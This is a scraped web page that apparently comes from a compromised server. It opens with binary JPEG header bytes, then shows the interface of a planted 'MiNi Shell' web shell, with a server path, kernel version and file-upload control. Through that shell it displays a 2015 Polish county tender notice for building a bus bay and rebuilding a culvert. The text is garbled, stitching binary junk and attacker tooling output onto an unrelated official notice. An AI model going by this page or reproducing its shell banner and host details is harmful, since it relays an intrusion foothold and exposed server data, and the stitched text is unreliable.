JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150410/49849-N-2015.html

<p class="kh_header"><b>Przysucha: Zadanie Nr 1 - Zaprojektowanie i budowa zatoki autobusowej w ciągu drogi powiatowej Nr 3332W Janików - Sokolniki Suche - DK. Nr 12 w m. Kamień Duży 

Zadanie Nr 2 - Zaprojektowanie i przebudowa przepustu w ciągu drogi powiatowej Nr 3311W Rusinów - Brogowa - Janików w km 5+116 w m. Brogowa</b><br>
<b>Numer ogłoszenia: 49849 - 2015; data zamieszczenia: 10.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Przysuski , Aleja Jana Pawła II 10, 26-400 Przysucha, woj. mazowieckie, tel. 48 6752553, faks 48 6753672.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przysucha.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie Nr 1 - Zaprojektowanie i budowa zatoki autobusowej w ciągu drogi powiatowej Nr 3332W Janików - Sokolniki Suche - DK. Nr 12 w m. Kamień Duży 

Zadanie Nr 2 - Zaprojektowanie i przebudowa przepustu w ciągu drogi powiatowej Nr 3311W Rusinów - Brogowa - Janików w km 5+116 w m. Brogowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: 

Zadanie Nr 1 - Zaprojektowanie i budowa zatoki autobusowej w ciągu drogi powiatowej Nr 3332W Janików - Sokolniki Suche - DK. Nr 12 w m. Kamień Duży 

Zadanie Nr 2 - Zaprojektowanie i przebudowa przepustu w ciągu drogi powiatowej Nr 3311W Rusinów - Brogowa - Janików w km 5+116 w m. Brogowa

2. W ramach realizacji zadań  należy wykonać:

Zadanie Nr 1 - Zaprojektowanie i budowa zatoki autobusowej w ciągu drogi powiatowej Nr 3332W Janików - Sokolniki Suche - DK. Nr 12 w m. Kamień Duży 

KOD CPV:
71320000-7 - usługi inżynieryjne w zakresie projektowania
45100000-8 - przygotowanie terenu pod budowę
45233222-1 - roboty budowlane w zakresie układania chodników i asfaltowania 
45233220-7 - roboty w zakresie nawierzchni dróg
45233290-8 - oznakowania dróg i urządzenia bezpieczeństwa ruchu

Zamówienie obejmuje:
a) Sporządzenie projektu budowlanego i uzyskanie dla niego wynikających z przepisów opinii, zgód, uzgodnień i pozwoleń wraz ze zgłoszeniem; 
b) Sporządzenie projektu wykonawczego i specyfikacji technicznych wykonania i odbioru robót budowlanych; 
c) Wykonanie robót budowlanych zgodnie z powyższymi projektami i specyfikacjami technicznymi wykonania i odbioru robót budowlanych;
d) Wszelkieroboty wynikające z konieczności podłączenia zatok do istniejącego układu komunikacyjnego wraz z jego ewentualną przebudową i zmianą organizacji ruchu wynikającą z przyjętych rozwiązań;
e) Wszelkie inne roboty jakie okażą się niezbędne dla wykonania przedmiotu zamówienia.

Zadanie dzieli się na dwa etapy: 
Etap I - Sporządzenie projektu budowlanego w zakresie wynikającym z Rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu oraz przygotowania odpowiednich dokumentów formalno - prawnych i uzyskanie na ich podstawie, w imieniu Zamawiającego, zgody właściwego organu na prowadzenie robót, w oparciu o obowiązujące przepisy (wg wymagań stosownej ustawy) do dnia 15.07.2015r. 
Etap II - Wykonanie robót budowlanych na podstawie opracowanej dokumentacji technicznej, przewidzianych do realizacji do dnia 30.10.2015r. 

Podstawę do sporządzenia dokumentacji projektowej i realizacji robót budowlanych będących przedmiotem niniejszego Zamówienia stanowią warunki i wymagania zawarte w niniejszym Programie Funkcjonalno-Użytkowym oraz obowiązujące przepisy prawne regulujące uzyskanie niezbędnych zezwoleń, pozwoleń, zgód i uzgodnień oraz realizację robót budowlanych zgodnie z prawem. 

Zadanie Nr 2 - Zaprojektowanie i przebudowa przepustu w ciągu drogi powiatowej Nr 3311W Rusinów - Brogowa - Janików w km 5+116 w m. Brogowa

KOD CPV:
71320000  - 7 -  usługi inżynieryjne w zakresie projektowania 
45100000  - 8 -  przygotowanie terenu pod budowę
45110000  - 1 -  roboty rozbiórkowe     
45221111  - 3 -  roboty budowlane w zakresie mostów drogowych
45233220  - 7 -  roboty w zakresie nawierzchni dróg
45233290  - 8 -  oznakowanie dróg i urządzenia bezpieczeństwa ruchu

Zamówienie obejmuje:
a) Sporządzenie projektu budowlanego i uzyskanie dla niego wynikających z przepisów opinii, zgód, uzgodnień i pozwoleń wraz z pozwoleniem na budowę; 
b) Sporządzenie projektu wykonawczego i specyfikacji technicznych wykonania i odbioru robót budowlanych; 
c) Wykonanie robót budowlanych zgodnie z powyższymi projektami i specyfikacjami technicznymi wykonania i odbioru robót budowlanych;
d) Przeprowadzenie prób i badań wymaganych dla przepustów drogowych oraz przygotowanie wszystkich niezbędnych dokumentów związanych z oddaniem zbudowanego przepustu do użytkowania;
e) Wszelkie inne roboty jakie okażą się niezbędne dla wykonania przedmiotu zamówienia.
Zadanie dzieli się na dwa etapy: 
Etap I - Sporządzenie projektu budowlanego w zakresie wynikającym z Rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu oraz przygotowania odpowiednich dokumentów formalno - prawnych i uzyskanie na ich podstawie, w imieniu Zamawiającego, zgody właściwego organu na prowadzenie robót, w oparciu o obowiązujące przepisy (wg wymagań stosownej ustawy) do dnia 31.08.2015r. 
Etap II - Wykonanie robót budowlanych na podstawie opracowanej dokumentacji technicznej, przewidzianych do realizacji do dnia 16.11.2015r. 

Podstawę do sporządzenia dokumentacji projektowej i realizacji robót budowlanych będących przedmiotem niniejszego Zamówienia stanowią warunki i wymagania zawarte w niniejszym Programie Funkcjonalno-Użytkowym, wydanych decyzjach administracyjnych dotyczących przebudowy przepustu oraz obowiązujące przepisy prawne regulujące uzyskanie niezbędnych zezwoleń, pozwoleń, zgód i uzgodnień oraz realizację robót budowlanych zgodnie z prawem. 

Zamawiający dopuszcza możliwość składania ofert częściowych. 

Roboty powinny być wykonane zgodnie z Programem Funkcjonalno-Użytkowym dla poszczególnych zadań, zgodnie ze sztuką budowlaną oraz obowiązującymi normami i przepisami prawnymi.

Szczegółowy opis przedmiotu zamówienia opisany został za pomocą załącznika nr 3 i nr 4 do SIWZ.

Termin realizacji zadań - Zadanie Nr 1- 30 października 2015 r. 
                                  Zadanie Nr 2 - 16 listopada 2015 r.

Zamawiajacy dopuszcza możliwość wcześniejszego wykonania i rozliczenia zrealizowanych zadań.

Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent, czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno eksploatacyjno  użytkowych nie gorszych niż te, podane w opisie przedmiotu zamówienia. 

Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego  jest zobowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.23.32.22-1, 45.10.00.00-8, 45.23.32.20-7, 45.23.32.90-8, 45.11.00.00-1, 45.22.11.11-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Poza dokumentami potwierdzającymi spełniania warunków udziału w postępowaniu oferta powinna również zawierać:
a) Wypełniony formularz oferty (załącznik nr1 do SIWZ),
b) W przypadku, gdy Wykonawcę w przetargu reprezentuje pełnomocnik oryginał pełnomocnictwa do działania w imieniu wykonawcy lub notarialnie potwierdzony odpis takiego pełnomocnictwa 
c) wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są załączyć oryginał pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia  publicznego.

Dokument pełnomocnictwa powinien być dołączony do oferty i zawierać w szczególności wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Pełnomocnika oraz zakres jego umocowania. Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę ustanowionego jako Pełnomocnika przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze  danego Wykonawcy. Stosowne odpisy z rejestru  powinny zostać dołączone do oferty.

Zamawiający żąda, aby w formularzu oferty Wykonawca wskazał części zamówienia, których wykonanie zamierza powierzyć podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje również możliwości dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej z uwzględnieniem podawanych warunków ich wystąpienia:
1) Zmiana sposobu wykonania zamówienia, materiałów budowlanych, sprzętu, urządzań, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w programie funkcjonalno - użytkowym  lub ofercie, stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie,
2) Zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) działania siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie terminie,
b) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub spełnienie wymogów technologicznych udokumentowanych w dzienniku budowy,
c) błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie,
d) konieczności uzyskania zmian lub uzgodnień, mogących spowodować wstrzymanie robót,
e) konieczności zmiany zakresu robót i finansowania,
f) konieczności wykonania dodatkowych badań i ekspertyz,
g) prac lub badań archeologicznych, wykopalisk, powodujących konieczność wstrzymania robót objętych niniejszą umową,
h) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, w tym udzielenie w trakcie realizacji zamówień dodatkowych i/lub uzupełniających, związanych z realizacja zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia), 
i) wstrzymania realizacji robót przez uprawniony organ z powodu znalezienia niewybuchów i/lub niewypałów,
j) jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać Zamawiającemu, personelowi Zamawiającego lub innemu wykonawcy zatrudnionemu przez Zamawiającego na terenie budowy,
k) Wystąpienia odmiennych od zakładanych warunków geologicznych i/lub terenowych,
l) Wystąpienia przedłużania się okresu osiągania parametrów technologicznych , nie 
zawinionych przez Wykonawcę,
m) Wystąpienia innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy skutkujących niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych kontraktem
    
W/w zmiany do umowy dopuszczalne są na następujących warunkach:
a) - ad. Pkt1) - zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego,
b) - ad. Pkt2) - zmiana na materiały, urządzenia i sprzęt posiadające co najmniej takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty oraz zmiana sposobu wykonania zamówienia powodująca usprawnienie procesu budowy, zwiększenia bezpieczeństwa na budowie  pod warunkiem nie zwiększenia ceny,
c) - ad. Pkt2) - w zakresie nie powodującym zwiększenia wynagrodzenia wykonawcy określonego w niniejszej umowie,
 d) - ad. Pkt3):
- lit. a) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania
-lit.b) - o czas trwania niesprzyjających warunków atmosferycznych, które uniemożliwiają wykonanie zamówienia,
- lit. c), d), e), f), g), h), i), j), k), l),m) - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych przedmiotem umowy, lub czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień lub do wykonania dodatkowych ekspertyz, badań.

W przypadku wystąpienia którejkolwiek okoliczności wymienionej wyżej termin okresu przewidzianego na ukończenie robót może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty nie dłużej jednak niż okres trwania tych okoliczności.   

Pozostałe zmiany:
a) Zmiany dotyczące zatrudnienia podwykonawców w przypadku gdy Wykonawca oświadczył, iż wykona umowę osobiście,
b)  Zmiany dotyczące rezygnacji z podwykonawstwa w przypadku  gdy Wykonawca oświadczył, iż wykona umowę przy pomocy podwykonawców,
c)  Zmiany podwykonawców oraz zakresu podwykonawstwa w przypadku gdy Wykonawca wykonuje umowę przy pomocy podwykonawców, przy czym zmiana podmiotu, który uczestniczy w realizacji części zamówienia jako podwykonawca na potencjale którego opierał się Wykonawca  składając ofertę będzie możliwa, ale jedynie  pod warunkiem, że nowy podmiot wykaże spełnienie warunków udziału w postępowaniu, które były wymagane przez Zamawiającego w ogłoszeniu i SIWZ.  
d) Zmiany osób wymienionych w §5  umowy (inspektor nadzoru, kierownik budowy) w przypadku zaistnienia takiej konieczności (choroba, śmierć, inne zdarzenia losowe)  
Warunki dokonania zmian: 
A. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną na piśmie, pod rygorem nieważności, 
B. Strona występująca o zmianę postanowień zawartej umowy: 
     - opisze zaistniałe okoliczności, 
     - uzasadni zaistnienie powyższych okoliczności, 
C. Wniosek o zmianę postanowień zawartej umowy musi być sporządzony na piśmie

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiatprzysuski.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostawo Powiatowe w Przysusze - Aleja Jana Pawła II 10, 26-400 Przysucha, pokój nr 27 lub za zaliczeniem pocztowym - Cena kompletu 21,89 zł brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2015 godzina 09:30, miejsce: Starostwo Powiatowe w Przysusze - Aleja Jana Pawła II 10, 26-400 Przysucha,
pokój nr 32 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - Zaprojektowanie i budowa zatoki autobusowej w ciągu drogi powiatowej Nr 3332W Janików - Sokolniki Suche - DK. Nr 12 w m. Kamień Duży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach realizacji zadań  należy wykonać:

Zadanie Nr 1 - Zaprojektowanie i budowa zatoki autobusowej w ciągu drogi powiatowej Nr 3332W Janików - Sokolniki Suche - DK. Nr 12 w m. Kamień Duży 

KOD CPV:
71320000-7 - usługi inżynieryjne w zakresie projektowania
45100000-8 - przygotowanie terenu pod budowę
45233222-1 - roboty budowlane w zakresie układania chodników i asfaltowania 
45233220-7 - roboty w zakresie nawierzchni dróg
45233290-8 - oznakowania dróg i urządzenia bezpieczeństwa ruchu

Zamówienie obejmuje:
a) Sporządzenie projektu budowlanego i uzyskanie dla niego wynikających z przepisów opinii, zgód, uzgodnień i pozwoleń wraz ze zgłoszeniem; 
b) Sporządzenie projektu wykonawczego i specyfikacji technicznych wykonania i odbioru robót budowlanych; 
c) Wykonanie robót budowlanych zgodnie z powyższymi projektami i specyfikacjami technicznymi wykonania i odbioru robót budowlanych;
d) Wszelkie roboty wynikające z konieczności podłączenia zatok do istniejącego układu komunikacyjnego wraz z jego ewentualną przebudową i zmianą organizacji ruchu wynikającą z przyjętych rozwiązań;
e) Wszelkie inne roboty jakie okażą się niezbędne dla wykonania przedmiotu zamówienia.

Zadanie dzieli się na dwa etapy: 
Etap I - Sporządzenie projektu budowlanego w zakresie wynikającym z Rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu oraz przygotowania odpowiednich dokumentów formalno - prawnych i uzyskanie na ich podstawie, w imieniu Zamawiającego, zgody właściwego organu na prowadzenie robót, w oparciu o obowiązujące przepisy (wg wymagań stosownej ustawy) do dnia 15.07.2015r. 
